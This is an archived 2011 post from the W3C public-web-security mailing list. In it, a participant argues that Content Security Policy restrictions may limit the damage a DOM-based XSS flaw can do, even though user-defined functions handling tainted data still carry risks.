- From: Devdatta Akhawe <dev.akhawe@gmail.com>
- Date: Thu, 24 Feb 2011 21:04:50 -0800
- To: gaz Heyes <gazheyes@gmail.com>
- Cc: Daniel Veditz <dveditz@mozilla.com>, public-web-security@w3.org
> Trouble is "important_variable" could be tainted with malicious data and the > user defined function might use it in some way with a DOM function and if > your user defined function can't use the DOM or anything then what use is > the user defined function? Yes. I am not saying it won't have problems. But with the rest of the CSP lockdowns (limits on external scripts being sourced, limits on no arbitrary inline scripts), it might be that the amount of bad things attacker can do is limited. For example, even with the full-inline-scripts-totally-off-CSP switched on, a page could still have broken javascript that is vulnerable to DOM based XSS -- the hope is that with CSP the amount of badness that the DOM based XSS could achieve is limited. =devdatta
Received on Friday, 25 February 2011 06:00:56 UTC